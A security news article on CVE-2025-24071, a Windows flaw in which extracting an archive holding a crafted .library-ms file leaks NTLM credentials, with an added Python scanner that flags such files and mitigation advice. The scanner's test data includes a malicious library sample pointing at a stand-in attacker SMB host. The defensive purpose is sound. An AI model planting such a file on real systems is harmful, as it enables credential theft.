
Security researchers have discovered and documented a Windows vulnerability (CVE-2025-24071) that lets an attacker capture a victim's NTLM authentication credentials with no interaction beyond extracting an archive. The vulnerability, patched in Microsoft's March 2025 Patch Tuesday update, abuses Windows Explorer's automatic file processing.
The exploit works by embedding a malicious SMB path in a .library-ms file and shipping that file inside a RAR or ZIP archive. When the victim extracts the archive, Windows Explorer automatically processes the .library-ms file to generate previews and index its metadata, even if the user never clicks on or opens the extracted file.
According to the technical analysis, the .library-ms format is XML-based and is trusted by Windows Explorer to define search and library locations. The vulnerability abuses that trust: the file contains a <simpleLocation> entry pointing at an attacker-controlled SMB server. On extraction, Windows automatically attempts to connect to that server, which starts an NTLM authentication handshake and hands the attacker the victim's Net-NTLMv2 challenge-response (commonly called the NTLMv2 hash). That value can be cracked offline or relayed to another service; it is not the stored NT hash and cannot be used directly for pass-the-hash.
Video PoC
Process monitoring confirms that Explorer.exe and SearchProtocolHost.exe process these files immediately after extraction, without user intervention. Wireshark captures further show that extraction triggers outbound SMB traffic: an SMB2 Negotiate Protocol Request followed by an SMB2 Session Setup Request carrying the NTLM authentication data.
The vulnerability is particularly concerning because the attack keeps working even after the extracted file is moved to the Recycle Bin: the indexer still processes it there, so the credential leak persists until the file is permanently deleted from the system.
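The following scanner is an added example for this article, not code from the page or from the published PoC. It parses .library-ms files the way the analysis describes the format (XML with <simpleLocation>/<url> entries), pulls every location, and flags any that resolves to a remote UNC or SMB host, which is exactly what makes Explorer and the search indexer authenticate outbound. The two sample library files, their file names and the host name attacker.example.invalid are constructed for the example.

```python
"""Scan .library-ms files for <simpleLocation> URLs that point at a remote
(UNC / SMB) host, the trigger described for CVE-2025-24071.

Added example for this article; not code from the page or the public PoC.
The sample library files, file names and host name below are constructed.
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample: the library's only location is a UNC path on an
# attacker host. "attacker.example.invalid" is a placeholder, not a server.
MALICIOUS_LIBRARY = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\attacker.example.invalid\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed benign sample: a known-folder reference, as in a normal library.
BENIGN_LIBRARY = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)")                       # \\host\share
URL_RE = re.compile(r"^(?:smb|file|https?|webdav)://([^\\/]*)", re.I)  # scheme://host/
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}


def classify_url(url):
    """Return (kind, host); kind is 'local', 'remote' or 'unknown'.
    Any location naming another host is 'remote': Explorer will open it over
    SMB/WebDAV and authenticate with NTLM while indexing the library."""
    u = url.strip()
    m = UNC_RE.match(u) or URL_RE.match(u)
    if m:
        host = m.group(1).lower()
        return ("local" if host in LOCAL_HOSTS else "remote", host)
    if re.match(r"^[A-Za-z]:[\\/]", u) or u.lower().startswith(("knownfolder:", "shell:")):
        return ("local", "")
    return ("unknown", "")


def extract_locations(xml_data):
    """Return every <simpleLocation><url> text, ignoring the XML namespace."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    urls = []
    for el in ET.fromstring(xml_data).iter():
        if el.tag.split("}")[-1] != "simpleLocation":
            continue
        for child in el:
            if child.tag.split("}")[-1] == "url" and child.text:
                urls.append(child.text.strip())
    return urls


def find_remote_locations(xml_data):
    """Return [(url, host), ...] for locations that point off the machine."""
    return [(u, h) for u in extract_locations(xml_data)
            for k, h in [classify_url(u)] if k == "remote"]


def scan_tree(root_dir):
    """Walk root_dir; report (path, url, host) for each .library-ms that
    references a remote host. On Windows include C:\\$Recycle.Bin in the
    scan, since a library sitting in the Recycle Bin is still indexed."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".library-ms"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    data = f.read()
                findings += [(path, u, h) for u, h in find_remote_locations(data)]
            except (OSError, ET.ParseError) as exc:
                print(f"[!] could not parse {path}: {exc}")
    return findings


def demo():
    """Write both constructed samples to a temp dir, scan it, return findings."""
    with tempfile.TemporaryDirectory() as d:
        for name, body in (("quarterly_report.library-ms", MALICIOUS_LIBRARY),
                           ("Documents.library-ms", BENIGN_LIBRARY)):
            with open(os.path.join(d, name), "w", encoding="utf-8") as f:
                f.write(body)
        return scan_tree(d)


if __name__ == "__main__":
    for path, url, host in demo():
        print(f"[+] {os.path.basename(path)} -> {url} (remote host: {host})")
```

Point scan_tree at user profiles, download directories and the Recycle Bin; a hit is a file the indexer will keep authenticating to until it is permanently deleted, and the host it names is what to block and hunt for in proxy and firewall logs.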
Evidence suggests this vulnerability has been actively exploited in the wild.
Researchers discovered forum posts by a threat actor known as "Krypt0n" (reportedly the developer of "EncryptHub Stealer"), who was potentially offering the exploit for sale on underground forums.

Proof-of-concept code has been published on GitHub, allowing security professionals to better understand and mitigate this threat. Users are strongly advised to install Microsoft's March 2025 security updates. Where patching is delayed, blocking outbound SMB (TCP port 445) at the network perimeter and enabling the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy limit how far a captured authentication can travel.